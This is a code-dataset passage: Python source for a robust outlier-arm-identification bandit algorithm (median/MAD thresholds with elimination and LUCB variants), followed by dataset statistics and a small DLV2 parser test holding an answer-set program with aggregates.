        self.AD_ucbs[i] = max(self.ucbs[i] - self.median_lcb, self.median_ucb - self.lcbs[i])
        self.AD_lcbs[i] = max(self.lcbs[i] - self.median_ucb, self.median_lcb - self.ucbs[i])
        # we define AD_lcb in the way above to provide better estimations of \widehat{AD} at the beginning stage
        # (original case-by-case alternative kept below for reference)
        # if self.ucbs[i] >= self.median_ucb:
        #     if self.median_ucb <= self.lcbs[i]:
        #         self.AD_lcbs[i] = self.lcbs[i] - self.median_ucb
        #     else:
        #         self.AD_lcbs[i] = 0
        # else:
        #     if self.ucbs[i] <= self.median_lcb:
        #         self.AD_lcbs[i] = self.median_lcb - self.ucbs[i]
        #     else:
        #         self.AD_lcbs[i] = 0
        if self.AD_ucbs[i] < self.AD_lcbs[i]:
            # Sanity check: the AD interval should never be inverted.
            print('something wrong when computing the absolute deviation')
    # MAD LCB/UCB computed analogously from the rankings of the AD bounds.
    ranking_AD_lcbs = np.argsort(self.AD_lcbs[self.index_select])
    self.s_MAD_lcb = self.index_select[ranking_AD_lcbs[start: end]]
    self.MAD_lcb = sum(self.AD_lcbs[i] for i in self.s_MAD_lcb) / len(self.s_MAD_lcb)
    ranking_AD_ucbs = np.argsort(self.AD_ucbs[self.index_select])
    self.s_MAD_ucb = self.index_select[ranking_AD_ucbs[start: end]]
    self.MAD_ucb = sum(self.AD_ucbs[i] for i in self.s_MAD_ucb) / len(self.s_MAD_ucb)
    # Threshold interval: median + k * MAD at both ends; the midpoint serves
    # as the anytime threshold estimate.
    self.threshold_lcb = self.median_lcb + self.k * self.MAD_lcb
    self.threshold_ucb = self.median_ucb + self.k * self.MAD_ucb
    self.threshold_at = (self.threshold_lcb + self.threshold_ucb)/2
    # An arm stays active while its confidence interval still overlaps the
    # threshold interval, i.e. its outlier status is undecided.
    self.s_active = list(range(self.n))
    for i in range(self.n):
        if self.ucbs[i] < self.threshold_lcb or self.lcbs[i] > self.threshold_ucb:
            self.s_active.remove(i)
    self.s_active_len = len(self.s_active)
def update(self):
    """Sample one arm uniformly from the candidate set, observe a reward,
    and refresh that arm's statistics and confidence bounds."""
    arm = np.random.choice(self.sample_candidate)
    reward = get_reward(self.instance, arm, self.sigma, self.instance_type)
    self.t += 1
    self.wins[arm] += reward
    self.pulls[arm] += 1
    self.rewards[arm] = self.wins[arm] / self.pulls[arm]
    # Bernoulli rewards use the Hoeffding radius; anything else the
    # sub-Gaussian radius.
    radius = (self.compute_ci_hoeffding(arm)
              if self.instance_type == 'bernoulli'
              else self.compute_ci_subgaussian(arm))
    self.ucbs[arm] = self.rewards[arm] + radius
    self.lcbs[arm] = self.rewards[arm] - radius
    # The threshold statistics only change when a selected arm was updated.
    if arm in self.index_select:
        self.update_internal()
def initialization(self):
    """Select the estimation subset, precompute the ground-truth outlier sets,
    pull each arm once, and initialize all confidence bounds."""
    self.index_select = np.random.choice(self.n, self.n_select, replace=False)
    n_select = self.n_select
    # [start, end) indexes the middle element(s) of the sorted selection:
    # one element for odd sizes, two for even sizes (averaged median).
    if n_select % 2 == 1:
        start = int((n_select - 1) / 2)
        end = int((n_select + 1) / 2)
    else:
        start = int((n_select - 2) / 2)
        end = int((n_select + 2) / 2)
    self.cluster_boundary_spec = [start, end]
    # Partition the selected arms by true mean: lower / middle / upper.
    ranking = np.argsort(self.instance[self.index_select])
    self.s_l_spec = self.index_select[ranking[:start]]
    self.s_m_spec = self.index_select[ranking[start:end]]
    self.s_u_spec = self.index_select[ranking[end:]]
    self.median_spec = sum(self.instance[i] for i in self.s_m_spec) / len(self.s_m_spec)
    # True absolute deviation of every arm from the sample median.
    for i in range(self.n):
        self.AD_spec[i] = abs(self.instance[i] - self.median_spec)
    ranking_AD = np.argsort(self.AD_spec[self.index_select])
    self.s_MAD_spec = self.index_select[ranking_AD[start:end]]
    self.MAD_spec = sum(self.AD_spec[i] for i in self.s_MAD_spec) / len(self.s_MAD_spec)
    self.threshold_spec = self.median_spec + self.k * self.MAD_spec
    # Ground-truth outlier sets: tolerant superset (sup), exact (spec),
    # strict subset (sub), and the population-level truth.
    for arm in range(self.n):
        if self.instance[arm] > self.threshold_spec - self.tol:
            self.outlier_set_spec_sup.append(arm)
        if self.instance[arm] > self.threshold_spec:
            self.outlier_set_spec.append(arm)
        if self.instance[arm] > self.threshold_spec + self.tol:
            self.outlier_set_spec_sub.append(arm)
        if self.instance[arm] > self.threshold_true:
            self.outlier_set_true.append(arm)
    # pull each arm once
    for arm in range(self.n):
        rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
        self.t += 1
        self.wins[arm] += rwd
        self.pulls[arm] += 1
        self.rewards[arm] = self.wins[arm] / self.pulls[arm]
        if self.instance_type == 'bernoulli':
            beta_tilde = self.compute_ci_hoeffding(arm)
        else:
            beta_tilde = self.compute_ci_subgaussian(arm)
        self.ucbs[arm] = self.rewards[arm] + beta_tilde
        self.lcbs[arm] = self.rewards[arm] - beta_tilde
    self.update_internal()
def output_outlier_set(self):
    """Return the arms whose empirical mean exceeds the anytime threshold."""
    return [arm for arm in range(self.n)
            if self.rewards[arm] > self.threshold_at]
def compute_error(self):
    """Score the current outlier prediction against the reference sets.

    Returns (error_general, error_spec_tol, error_spec), each 0/1:
    - error_general: 0 iff the prediction equals the population-level truth;
    - error_spec_tol: 0 iff the prediction lies between the strict subset
      and the tolerant superset of the subset-specific outliers;
    - error_spec: 0 iff the prediction equals the subset-specific outliers.
    """
    predicted = self.output_outlier_set()
    predicted_set = set(predicted)
    within_tol = (predicted_set <= set(self.outlier_set_spec_sup)
                  and set(self.outlier_set_spec_sub) <= predicted_set)
    error_spec_tol = 0 if within_tol else 1
    error_spec = 0 if predicted == self.outlier_set_spec else 1
    error_general = 0 if predicted == self.outlier_set_true else 1
    return error_general, error_spec_tol, error_spec
class ROAI:
    """Robust Outlier Arm Identification.

    Bandit algorithms (elimination-style and LUCB-style variants) that
    identify arms whose mean exceeds ``median + k * MAD``, where the median
    and MAD are estimated from a randomly selected subset of arms via
    confidence bounds.
    """
    def __init__(self, instance, n_select, mean, std, k, instance_type, sigma, delta, tol):
        # instance: vector of true arm means used by the reward simulator.
        # n_select: number of arms randomly chosen to estimate median/MAD.
        self.n = len(instance)
        n = self.n
        self.instance = instance
        self.n_select = n_select
        self.mean = mean
        self.std = std
        self.k_original = k
        # Population-level ("true") outlier threshold from mean/std.
        self.threshold_true = self.mean + self.k_original * self.std
        self.outlier_set_true = []
        # 1.4826 rescales MAD into a consistent estimator of the standard
        # deviation under normality.
        self.k = 1.4826 * k
        # k_original denotes the original k value
        # while k is adjusted for MAD
        self.instance_type = instance_type
        self.sigma = sigma
        self.delta = delta
        self.tol = tol
        # t counts the total number of rounds (pulls) so far.
        self.t = 0
        self.wins = np.zeros(n)
        self.pulls = np.zeros(n)
        self.rewards = np.zeros(n)
        self.ucbs = np.ones(n)
        self.lcbs = np.zeros(n)
        # s: set; u: upper; m: median; l: lower; all in terms of median value
        # MAD: median absolute deviation
        self.index_select = []
        self.cluster_boundary_spec = []
        # cluster boundary store boundaries for the selected index
        # everything below are primarily designed for the selected index
        # we will use spec to denote the method-specific
        self.s_u_spec = []
        self.s_m_spec = []
        self.s_l_spec = []
        self.median_spec = 0
        # AD = absolute deviation
        self.AD_spec = np.zeros(n)
        self.s_MAD_spec = []
        self.MAD_spec = 0
        self.threshold_spec = 0
        self.outlier_set_spec = []
        self.outlier_set_spec_sub = []
        self.outlier_set_spec_sup = []
        # calculated based on the specific way of selecting outlier threshold
        # at = anytime
        # anytime here refers to anytime decision of the set
        self.s_u_at = []
        self.s_m_at = []
        self.s_l_at = []
        self.median_at = 0
        self.AD_at = np.zeros(n)
        self.s_MAD_at = []
        self.MAD_at = 0
        self.threshold_at = 0
        # sample_candidate is the set for arms to be sampled, which should be the union of three components
        self.sample_candidate = []
        self.sample_candidate_threshold = []
        self.sample_candidate_arms = []
        # median lcb = median(lcbs), same for median_ucb
        self.s_median_lcb = []
        self.median_lcb = 0
        self.s_median_ucb = []
        self.median_ucb = 1
        # AD_ucbs = upper bound of absolute deviation, same for AD_lcbs
        self.AD_ucbs = np.ones(n)
        self.AD_lcbs = np.ones(n)
        # s_MAD_ucb contains arms that contribute to the ucb of MAD
        self.s_MAD_ucb = []
        self.MAD_ucb = 1
        self.s_MAD_lcb = []
        self.MAD_lcb = 0
        self.threshold_lcb = 0
        self.threshold_ucb = 1
        # below are for lucb algorithm
        self.s_outlier_at = []
        self.s_not_outlier_at = []
        # upper/lower set of arms in terms of AD at anytime; same as self.s_MAD_at
        self.s_uAD_at = []
        self.s_lAD_at = []
        self.s_active = []
        # arms in active set are those haven't been determined
        self.s_active_len = n

    def compute_ci_hoeffding(self, arm):
        """Hoeffding confidence radius for `arm` (Bernoulli rewards)."""
        log_term = math.log((np.pi**2 * (self.n) * (self.pulls[arm] ** 2)) / (3 * self.delta))
        return math.sqrt(log_term / (2 * self.pulls[arm]))

    def compute_ci_subgaussian(self, arm):
        """Sub-Gaussian confidence radius for `arm` (scale ``self.sigma``)."""
        log_term = math.log((np.pi**2 * (self.n) * (self.pulls[arm] ** 2)) / (3 * self.delta))
        return self.sigma * math.sqrt(2 * log_term / self.pulls[arm])

    # update threshold and sample candidate
    # _elimi = elimination-styled updating in how to select sample candidate
    def update_internal_elimi(self):
        """Recompute median/MAD/threshold confidence bounds, then rebuild
        the active set and the elimination-style sample-candidate set."""
        [start, end] = self.cluster_boundary_spec
        # Median LCB/UCB: average of the middle-ranked lower/upper bounds
        # over the selected arms.
        ranking_lcbs = np.argsort(self.lcbs[self.index_select])
        self.s_median_lcb = self.index_select[ranking_lcbs[start: end]]
        self.median_lcb = sum(self.lcbs[i] for i in self.s_median_lcb) / len(self.s_median_lcb)
        ranking_ucbs = np.argsort(self.ucbs[self.index_select])
        self.s_median_ucb = self.index_select[ranking_ucbs[start: end]]
        self.median_ucb = sum(self.ucbs[i] for i in self.s_median_ucb) / len(self.s_median_ucb)
        for i in self.index_select:
            # Confidence bounds on each selected arm's absolute deviation.
            self.AD_ucbs[i] = max(self.ucbs[i] - self.median_lcb, self.median_ucb - self.lcbs[i])
            self.AD_lcbs[i] = max(self.lcbs[i] - self.median_ucb, self.median_lcb - self.ucbs[i])
            # we define AD_lcb in the way above to provide better estimations of \widehat{AD} at the beginning stage
            # (original case-by-case alternative kept below for reference)
            # if self.ucbs[i] >= self.median_ucb:
            #     if self.median_ucb <= self.lcbs[i]:
            #         self.AD_lcbs[i] = self.lcbs[i] - self.median_ucb
            #     else:
            #         self.AD_lcbs[i] = 0
            # else:
            #     if self.ucbs[i] <= self.median_lcb:
            #         self.AD_lcbs[i] = self.median_lcb - self.ucbs[i]
            #     else:
            #         self.AD_lcbs[i] = 0
            if self.AD_ucbs[i] < self.AD_lcbs[i]:
                # Sanity check: the AD interval should never be inverted.
                print('something wrong when computing the absolute deviation')
        # MAD LCB/UCB computed analogously from the AD-bound rankings.
        ranking_AD_lcbs = np.argsort(self.AD_lcbs[self.index_select])
        self.s_MAD_lcb = self.index_select[ranking_AD_lcbs[start: end]]
        self.MAD_lcb = sum(self.AD_lcbs[i] for i in self.s_MAD_lcb) / len(self.s_MAD_lcb)
        ranking_AD_ucbs = np.argsort(self.AD_ucbs[self.index_select])
        self.s_MAD_ucb = self.index_select[ranking_AD_ucbs[start: end]]
        self.MAD_ucb = sum(self.AD_ucbs[i] for i in self.s_MAD_ucb) / len(self.s_MAD_ucb)
        self.threshold_lcb = self.median_lcb + self.k * self.MAD_lcb
        self.threshold_ucb = self.median_ucb + self.k * self.MAD_ucb
        self.threshold_at = (self.threshold_lcb + self.threshold_ucb)/2
        # arms whose confidence interval intersects with the ci of threshold should be sample candidates
        self.s_active = list(range(self.n))
        for i in range(self.n):
            if self.ucbs[i] < self.threshold_lcb or self.lcbs[i] > self.threshold_ucb:
                self.s_active.remove(i)
        self.s_active_len = len(self.s_active)
        self.sample_candidate = list(range(self.n))
        for i in range(self.n):
            if self.ucbs[i] < self.threshold_lcb or self.lcbs[i] > self.threshold_ucb:
                self.sample_candidate.remove(i)
        # things below are specified for the elimination style
        for i in self.index_select:
            # Keep sampling selected arms whose interval still overlaps the
            # median interval or the MAD interval (their rank is undecided).
            if (self.ucbs[i] >= self.median_ucb and self.lcbs[i] <= self.median_ucb) \
                    or (self.ucbs[i] < self.median_ucb and self.ucbs[i] >= self.median_lcb):
                self.sample_candidate.append(i)
            if (self.AD_ucbs[i] >= self.MAD_ucb and self.AD_lcbs[i] <= self.MAD_ucb) \
                    or (self.AD_ucbs[i] < self.MAD_ucb and self.AD_ucbs[i] >= self.MAD_lcb):
                self.sample_candidate.append(i)
        self.sample_candidate = list(set(self.sample_candidate))
        self.sample_candidate.sort()

    def initialization_elimi(self):
        """Initialize the elimination-style run: choose the estimation subset,
        derive the reference outlier sets, pull each arm once."""
        self.index_select = np.random.choice(self.n, self.n_select, replace=False)
        # compute true set of outliers
        n = self.n_select
        # [start, end) indexes the middle element(s) of the sorted selection.
        if n % 2 == 1:
            start = int((n - 1) / 2)
            end = int((n + 1) / 2)
        else:
            start = int((n - 2) / 2)
            end = int((n + 2) / 2)
        self.cluster_boundary_spec = [start, end]
        ranking = np.argsort(self.instance[self.index_select])
        self.s_l_spec = self.index_select[ranking[:start]]
        self.s_m_spec = self.index_select[ranking[start:end]]
        self.s_u_spec = self.index_select[ranking[end:]]
        self.median_spec = sum(self.instance[i] for i in self.s_m_spec) / len(self.s_m_spec)
        for i in range(self.n):
            self.AD_spec[i] = abs(self.instance[i] - self.median_spec)
        ranking_AD = np.argsort(self.AD_spec[self.index_select])
        self.s_MAD_spec = self.index_select[ranking_AD[start:end]]
        self.MAD_spec = sum(self.AD_spec[i] for i in self.s_MAD_spec) / len(self.s_MAD_spec)
        self.threshold_spec = self.median_spec + self.k * self.MAD_spec
        # Reference outlier sets: tolerant superset (sup), exact (spec),
        # strict subset (sub), and the population-level truth.
        for arm in range(self.n):
            if self.instance[arm] > self.threshold_spec - self.tol:
                self.outlier_set_spec_sup.append(arm)
            if self.instance[arm] > self.threshold_spec:
                self.outlier_set_spec.append(arm)
            if self.instance[arm] > self.threshold_spec + self.tol:
                self.outlier_set_spec_sub.append(arm)
            if self.instance[arm] > self.threshold_true:
                self.outlier_set_true.append(arm)
        # pull each arm once
        for arm in range(self.n):
            rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
            self.t += 1
            self.wins[arm] += rwd
            self.pulls[arm] += 1
            self.rewards[arm] = self.wins[arm] / self.pulls[arm]
            if self.instance_type == 'bernoulli':
                beta_tilde = self.compute_ci_hoeffding(arm)
            else:
                beta_tilde = self.compute_ci_subgaussian(arm)
            self.ucbs[arm] = self.rewards[arm] + beta_tilde
            self.lcbs[arm] = self.rewards[arm] - beta_tilde
        self.update_internal_elimi()

    def update_elimi(self):
        """One elimination-style round: pull a uniformly chosen candidate arm
        and refresh its statistics and all derived bounds."""
        self.t += 1
        if len(self.sample_candidate) > 0:
            arm = np.random.choice(self.sample_candidate)
            rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
            self.pulls[arm] += 1
            self.wins[arm] += rwd
            self.rewards[arm] = self.wins[arm] / self.pulls[arm]
            if self.instance_type == 'bernoulli':
                beta_tilde = self.compute_ci_hoeffding(arm)
            else:
                beta_tilde = self.compute_ci_subgaussian(arm)
            self.ucbs[arm] = self.rewards[arm] + beta_tilde
            self.lcbs[arm] = self.rewards[arm] - beta_tilde
            self.update_internal_elimi()

    # lucb styled algorithm
    def update_internal_lucb(self):
        """Recompute median/MAD/threshold confidence bounds and build the
        LUCB-style sample-candidate list (most ambiguous arm per category)."""
        [start, end] = self.cluster_boundary_spec
        ranking_lcbs = np.argsort(self.lcbs[self.index_select])
        self.s_median_lcb = self.index_select[ranking_lcbs[start: end]]
        self.median_lcb = sum(self.lcbs[i] for i in self.s_median_lcb) / len(self.s_median_lcb)
        ranking_ucbs = np.argsort(self.ucbs[self.index_select])
        self.s_median_ucb = self.index_select[ranking_ucbs[start: end]]
        self.median_ucb = sum(self.ucbs[i] for i in self.s_median_ucb) / len(self.s_median_ucb)
        for i in self.index_select:
            self.AD_ucbs[i] = max(self.ucbs[i] - self.median_lcb, self.median_ucb - self.lcbs[i])
            self.AD_lcbs[i] = max(self.lcbs[i] - self.median_ucb, self.median_lcb - self.ucbs[i])
            # we define AD_lcb in the way above to provide better estimations of \widehat{AD} at the beginning stage
            # (original case-by-case alternative kept below for reference)
            # if self.ucbs[i] >= self.median_ucb:
            #     if self.median_ucb <= self.lcbs[i]:
            #         self.AD_lcbs[i] = self.lcbs[i] - self.median_ucb
            #     else:
            #         self.AD_lcbs[i] = 0
            # else:
            #     if self.ucbs[i] <= self.median_lcb:
            #         self.AD_lcbs[i] = self.median_lcb - self.ucbs[i]
            #     else:
            #         self.AD_lcbs[i] = 0
            if self.AD_ucbs[i] < self.AD_lcbs[i]:
                print('something wrong when computing the absolute deviation')
        ranking_AD_lcbs = np.argsort(self.AD_lcbs[self.index_select])
        self.s_MAD_lcb = self.index_select[ranking_AD_lcbs[start: end]]
        self.MAD_lcb = sum(self.AD_lcbs[i] for i in self.s_MAD_lcb) / len(self.s_MAD_lcb)
        ranking_AD_ucbs = np.argsort(self.AD_ucbs[self.index_select])
        self.s_MAD_ucb = self.index_select[ranking_AD_ucbs[start: end]]
        self.MAD_ucb = sum(self.AD_ucbs[i] for i in self.s_MAD_ucb) / len(self.s_MAD_ucb)
        self.threshold_lcb = self.median_lcb + self.k * self.MAD_lcb
        self.threshold_ucb = self.median_ucb + self.k * self.MAD_ucb
        self.threshold_at = (self.threshold_lcb + self.threshold_ucb)/2
        self.s_active = list(range(self.n))
        for i in range(self.n):
            if self.ucbs[i] < self.threshold_lcb or self.lcbs[i] > self.threshold_ucb:
                self.s_active.remove(i)
        self.s_active_len = len(self.s_active)
        # Point estimates: partition the selected arms by empirical mean and
        # by anytime AD estimate.
        ranking_means = np.argsort(self.rewards[self.index_select])
        self.s_l_at = self.index_select[ranking_means[:start]]
        self.s_m_at = self.index_select[ranking_means[start:end]]
        self.s_u_at = self.index_select[ranking_means[end:]]
        self.median_at = sum(self.rewards[i] for i in self.s_m_at) / len(self.s_m_at)
        for i in self.index_select:
            self.AD_at[i] = (self.AD_lcbs[i] + self.AD_ucbs[i])/2
            # self.AD_at[i] = abs(self.rewards[i] - self.median_at)
            # one can also calculate \hat{AD} in the commented way and it produce slightly better results in the beginning period
        # s_lAD_at denote the set of arms associated with low value of AD
        ranking_AD = np.argsort(self.AD_at[self.index_select])
        self.s_lAD_at = self.index_select[ranking_AD[:start]]
        self.s_MAD_at = self.index_select[ranking_AD[start:end]]
        self.s_uAD_at = self.index_select[ranking_AD[end:]]
        self.MAD_at = sum(self.AD_at[i] for i in self.s_MAD_at) / len(self.s_MAD_at)
        # self.threshold_at = self.median_at + self.k * self.MAD_at
        # Split all arms into empirical outliers / non-outliers.
        self.s_outlier_at = []
        self.s_not_outlier_at = []
        for arm in range(self.n):
            if self.rewards[arm] >= self.threshold_at:
                self.s_outlier_at.append(arm)
            else:
                self.s_not_outlier_at.append(arm)
        # things below are specified for the lucb style
        # arms whose confidence interval intersects with the c.i. of threshold should be sample candidates
        # Each paragraph below picks the single most ambiguous arm of one
        # category (ties broken uniformly at random) and appends it.
        self.sample_candidate = []
        self.sample_candidate_arms = []
        self.sample_candidate_threshold = []
        # Empirical outlier with the weakest lower bound.
        s_outlier_at = self.s_outlier_at
        s_candidate = [(x, self.lcbs[x]) for x in s_outlier_at]
        if len(s_candidate) > 0:
            candidate_value = min(s_candidate, key=lambda x: x[1])[1]
            s_candidate_index = [x for x, y in s_candidate if y == candidate_value]
            candidate = np.random.choice(s_candidate_index)
            self.sample_candidate.append(candidate)
            self.sample_candidate_arms.append(candidate)
        # Empirical non-outlier with the strongest upper bound.
        s_not_outlier_at = self.s_not_outlier_at
        s_candidate = [(x, self.ucbs[x]) for x in s_not_outlier_at]
        if len(s_candidate) > 0:
            candidate_value = max(s_candidate, key=lambda x: x[1])[1]
            s_candidate_index = [x for x, y in s_candidate if y == candidate_value]
            candidate = np.random.choice(s_candidate_index)
            self.sample_candidate.append(candidate)
            self.sample_candidate_arms.append(candidate)
        # Lower-cluster arm that could still rise above the median.
        s_l_at = self.s_l_at
        s_candidate = [(x, self.ucbs[x]) for x in s_l_at]
        if len(s_candidate) > 0:
            candidate_value = max(s_candidate, key=lambda x: x[1])[1]
            s_candidate_index = [x for x, y in s_candidate if y == candidate_value]
            candidate = np.random.choice(s_candidate_index)
            self.sample_candidate.append(candidate)
            self.sample_candidate_threshold.append(candidate)
        # Upper-cluster arm that could still fall below the median.
        s_u_at = self.s_u_at
        s_candidate = [(x, self.lcbs[x]) for x in s_u_at]
        if len(s_candidate) > 0:
            candidate_value = min(s_candidate, key=lambda x: x[1])[1]
            s_candidate_index = [x for x, y in s_candidate if y == candidate_value]
            candidate = np.random.choice(s_candidate_index)
            self.sample_candidate.append(candidate)
            self.sample_candidate_threshold.append(candidate)
        # Analogous picks for the AD (MAD) ordering.
        s_lAD_at = self.s_lAD_at
        s_candidate = [(x, self.AD_ucbs[x]) for x in s_lAD_at]
        if len(s_candidate) > 0:
            candidate_value = max(s_candidate, key=lambda x: x[1])[1]
            s_candidate_index = [x for x, y in s_candidate if y == candidate_value]
            candidate = np.random.choice(s_candidate_index)
            self.sample_candidate.append(candidate)
            self.sample_candidate_threshold.append(candidate)
        s_uAD_at = self.s_uAD_at
        s_candidate = [(x, self.AD_lcbs[x]) for x in s_uAD_at]
        if len(s_candidate) > 0:
            candidate_value = min(s_candidate, key=lambda x: x[1])[1]
            s_candidate_index = [x for x, y in s_candidate if y == candidate_value]
            candidate = np.random.choice(s_candidate_index)
            self.sample_candidate.append(candidate)
            self.sample_candidate_threshold.append(candidate)
        # Arms at or below the median cluster that could move up...
        s_lm_at = set(list(self.s_l_at) + list(self.s_m_at))
        s_candidate = [(x, self.ucbs[x]) for x in s_lm_at]
        if len(s_candidate) > 0:
            candidate_value = max(s_candidate, key=lambda x: x[1])[1]
            s_candidate_index = [x for x, y in s_candidate if y == candidate_value]
            candidate = np.random.choice(s_candidate_index)
            self.sample_candidate.append(candidate)
            self.sample_candidate_threshold.append(candidate)
        # ...and at or above it that could move down.
        s_um_at = set(list(self.s_u_at) + list(self.s_m_at))
        s_candidate = [(x, self.lcbs[x]) for x in s_um_at]
        if len(s_candidate) > 0:
            candidate_value = min(s_candidate, key=lambda x: x[1])[1]
            s_candidate_index = [x for x, y in s_candidate if y == candidate_value]
            candidate = np.random.choice(s_candidate_index)
            self.sample_candidate.append(candidate)
            self.sample_candidate_threshold.append(candidate)
        # Same two picks for the AD ordering.
        s_lmAD_at = set(list(self.s_lAD_at) + list(self.s_MAD_at))
        s_candidate = [(x, self.AD_ucbs[x]) for x in s_lmAD_at]
        if len(s_candidate) > 0:
            candidate_value = max(s_candidate, key=lambda x: x[1])[1]
            s_candidate_index = [x for x, y in s_candidate if y == candidate_value]
            candidate = np.random.choice(s_candidate_index)
            self.sample_candidate.append(candidate)
            self.sample_candidate_threshold.append(candidate)
        s_umAD_at = set(list(self.s_uAD_at) + list(self.s_MAD_at))
        s_candidate = [(x, self.AD_lcbs[x]) for x in s_umAD_at]
        if len(s_candidate) > 0:
            candidate_value = min(s_candidate, key=lambda x: x[1])[1]
            s_candidate_index = [x for x, y in s_candidate if y == candidate_value]
            candidate = np.random.choice(s_candidate_index)
            self.sample_candidate.append(candidate)
            self.sample_candidate_threshold.append(candidate)
        # self.sample_candidate = list(set(self.sample_candidate))
        # since we only pull one arm at each time in experiment, we will allow repeated arms in sample candidate
        # actually that's more fair to increase the prob to select that arm

    def initialization_lucb(self):
        """Initialize the LUCB-style run: choose the estimation subset,
        derive the reference outlier sets, pull each arm once."""
        self.index_select = np.random.choice(self.n, self.n_select, replace=False)
        # compute true set of outliers
        n = self.n_select
        if n % 2 == 1:
            start = int((n - 1) / 2)
            end = int((n + 1) / 2)
        else:
            start = int((n - 2) / 2)
            end = int((n + 2) / 2)
        self.cluster_boundary_spec = [start, end]
        ranking = np.argsort(self.instance[self.index_select])
        self.s_l_spec = self.index_select[ranking[:start]]
        self.s_m_spec = self.index_select[ranking[start:end]]
        self.s_u_spec = self.index_select[ranking[end:]]
        self.median_spec = sum(self.instance[i] for i in self.s_m_spec) / len(self.s_m_spec)
        for i in range(self.n):
            self.AD_spec[i] = abs(self.instance[i] - self.median_spec)
        ranking_AD = np.argsort(self.AD_spec[self.index_select])
        self.s_MAD_spec = self.index_select[ranking_AD[start:end]]
        self.MAD_spec = sum(self.AD_spec[i] for i in self.s_MAD_spec) / len(self.s_MAD_spec)
        self.threshold_spec = self.median_spec + self.k * self.MAD_spec
        for arm in range(self.n):
            if self.instance[arm] > self.threshold_true:
                self.outlier_set_true.append(arm)
            if self.instance[arm] > self.threshold_spec - self.tol:
                self.outlier_set_spec_sup.append(arm)
            if self.instance[arm] > self.threshold_spec:
                self.outlier_set_spec.append(arm)
            if self.instance[arm] > self.threshold_spec + self.tol:
                self.outlier_set_spec_sub.append(arm)
        # pull each arm once
        for arm in range(self.n):
            rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
            self.t += 1
            self.wins[arm] += rwd
            self.pulls[arm] += 1
            self.rewards[arm] = self.wins[arm] / self.pulls[arm]
            if self.instance_type == 'bernoulli':
                beta_tilde = self.compute_ci_hoeffding(arm)
            else:
                beta_tilde = self.compute_ci_subgaussian(arm)
            self.ucbs[arm] = self.rewards[arm] + beta_tilde
            self.lcbs[arm] = self.rewards[arm] - beta_tilde
        self.update_internal_lucb()

    def update_lucb(self):
        """One LUCB-style round: pull one arm drawn from the candidate list
        and refresh its statistics and all derived bounds."""
        self.t += 1
        if len(self.sample_candidate) > 0:
            # if len(self.sample_candidate_arms) > 0 and len(self.sample_candidate_threshold) > 0:
            #     dice = np.random.random()
            #     if dice > 0.5:
            #         arm = np.random.choice(self.sample_candidate_threshold)
            #     else:
            #         arm = np.random.choice(self.sample_candidate_arms)
            # else:
            #     arm = np.random.choice(self.sample_candidate)
            arm = np.random.choice(self.sample_candidate)
            # randomly pull an arm from sample_candidate
            rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
            self.pulls[arm] += 1
            self.wins[arm] += rwd
            self.rewards[arm] = self.wins[arm] / self.pulls[arm]
            if self.instance_type == 'bernoulli':
                beta_tilde = self.compute_ci_hoeffding(arm)
            else:
                beta_tilde = self.compute_ci_subgaussian(arm)
            self.ucbs[arm] = self.rewards[arm] + beta_tilde
            self.lcbs[arm] = self.rewards[arm] - beta_tilde
            self.update_internal_lucb()

    def output_outlier_set(self):
        """Return the arms whose empirical mean exceeds the anytime threshold."""
        outlier_set_empirical = []
        for arm in range(self.n):
            if self.rewards[arm] > self.threshold_at:
                outlier_set_empirical.append(arm)
        return outlier_set_empirical

    def compute_error(self):
        """Score the current prediction; returns 0/1 indicators
        (error_general, error_spec_tol, error_spec)."""
        outlier_set_at = self.output_outlier_set()
        error_spec_tol = 1
        error_spec = 1
        # Tolerant success: prediction sandwiched between the strict subset
        # and the tolerant superset.
        if (set(outlier_set_at).issubset(set(self.outlier_set_spec_sup))) and \
                (set(self.outlier_set_spec_sub).issubset(set(outlier_set_at))):
            error_spec_tol = 0
        if outlier_set_at == self.outlier_set_spec:
            error_spec = 0
        error_general = 1
        if outlier_set_at == self.outlier_set_true:
            error_general = 0
        return error_general, error_spec_tol, error_spec
| 45.800399 | 129 | 0.604855 | 6,598 | 45,892 | 3.984692 | 0.039709 | 0.026055 | 0.039938 | 0.026701 | 0.916397 | 0.892244 | 0.873569 | 0.85516 | 0.839755 | 0.830056 | 0 | 0.007251 | 0.284777 | 45,892 | 1,001 | 130 | 45.846154 | 0.793742 | 0.098078 | 0 | 0.880835 | 0 | 0 | 0.005813 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044226 | false | 0 | 0.002457 | 0 | 0.076167 | 0.003686 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9536ce981b6536882de7dc3089d585f8a4475eb4 | 323 | py | Python | tests/parser/aggregates.duplicated.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/aggregates.duplicated.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/aggregates.duplicated.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
mymax(X) :- #max{P: c(P)} = X, dom(X).
mymin(X) :- #min{P: c(P)} = X, dom(X).
dom(0). dom(1).
c(X) | d(X) :- dom(X).
:- not c(0).
:- not c(1).
"""
output = """
mymax(X) :- #max{P: c(P)} = X, dom(X).
mymin(X) :- #min{P: c(P)} = X, dom(X).
dom(0). dom(1).
c(X) | d(X) :- dom(X).
:- not c(0).
:- not c(1).
"""
